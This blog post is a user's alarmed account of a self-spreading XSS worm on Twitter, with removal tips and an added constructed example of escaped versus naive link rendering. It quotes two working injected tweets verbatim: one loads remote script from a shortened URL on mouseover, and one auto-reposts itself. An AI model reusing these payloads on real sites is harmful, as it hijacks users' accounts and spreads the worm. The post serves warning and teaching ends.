VIRUS/Glitch in Twitter’s new location feature?


My Twitter just looked like this:

Someone used a glitch in the new location feature I guess. Look at this code in their advertising for the feature:


Tweet
New! Add a location to your tweets. Turn it on - No thanks
Latest: http://t.co/@"style="font-size:999999999999px;"onmouseover="$.getScript('http:\u002f\u002fis.gd\u002ffl9A7')"/ 3 minutes ago

You see it in my screenshot. So basically me doing nothing transformed my whole Twitter into what you see in the screenshot; the error was reloading itself as if Twitter was trying to post over and over again. It appears I posted that code too; everyone who sees it gets affected.

After I clicked Home, every link on my page was leading to t.co instead of Twitter. It feels and looks like a virus. It is spreading through Twitter!! My whole timeline is complaining, so please stay away from Twitter or use an app which might be safe!

[EDIT]

Tweetdeck seems to be safe. If you are affected by that worm, you can delete your own tweet(s) spreading the worm: You can view your own profile in Tweetdeck by clicking your picture, Other Actions, User, View Profile. Then next to your “virus” tweet, Other Actions, Tweet, Delete.

The offender looks like this, if YOU tweeted this, delete it please:

http://a.no/@"onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit()" style="color:#000;background:#000;/

[EDIT 2]
First afterthought: Wow, it seems like such a beginner’s error, to allow user-generated content to inject code into Twitter.com. Twitter is a massive thing now, couldn’t anyone foresee this?

2nd afterthought: Twitter has double-post protection. If the hackers were a little bit more clever, they would have made the virus change its form like HIV, and then I would have spammed out 10 or 20 of those links in a state of surprise. *swallows* I hope Twitter hires more security guys now.
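
The kind of injection described in the first afterthought, as an added example that is not part of the original post and is not Twitter's code: it assumes the tweet text was auto-linked by pasting the matched URL into `href="..."` without escaping, so a double quote inside the "URL" ends the attribute early. The function names and the sample tweet are constructed for illustration.

```javascript
// Added example (constructed): naive vs. escaped auto-linking of URLs in user text.
const URL_RE = /https?:\/\/\S+/g;

// Constructed sample with the same shape as the tweet on this page, harmless handler.
const SAMPLE = 'Latest: http://example.test/@"onmouseover="void(0)"/ 3 minutes ago';

// Escape the characters that can close an attribute value or open a tag.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable form: the matched text goes into href="..." as-is, so the first
// double quote in it terminates href and the rest is parsed as new attributes.
function linkifyNaive(text) {
  return text.replace(URL_RE, (url) => `<a href="${url}">${url}</a>`);
}

// Hardened form: every piece of user text is escaped for its HTML context,
// both the plain text around the link and the URL inside the attribute.
function linkifySafe(text) {
  let out = '';
  let last = 0;
  for (const m of text.matchAll(URL_RE)) {
    out += escapeHtml(text.slice(last, m.index));
    const url = escapeHtml(m[0]);
    out += `<a href="${url}">${url}</a>`;
    last = m.index + m[0].length;
  }
  return out + escapeHtml(text.slice(last));
}

// Check helper: list the attribute names in the first <a ...> opening tag,
// roughly the way a browser would split name="value" pairs.
function anchorAttributes(html) {
  const tag = html.match(/<a\s[^>]*>/);
  if (!tag) return [];
  return [...tag[0].matchAll(/([a-zA-Z-]+)="[^"]*"/g)].map((m) => m[1]);
}

console.log('naive:', anchorAttributes(linkifyNaive(SAMPLE)));
console.log('safe: ', anchorAttributes(linkifySafe(SAMPLE)));
```

In the naive output the anchor gains an event-handler attribute that came entirely from tweet text; in the escaped output the same characters stay inside the `href` value as `&quot;`.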
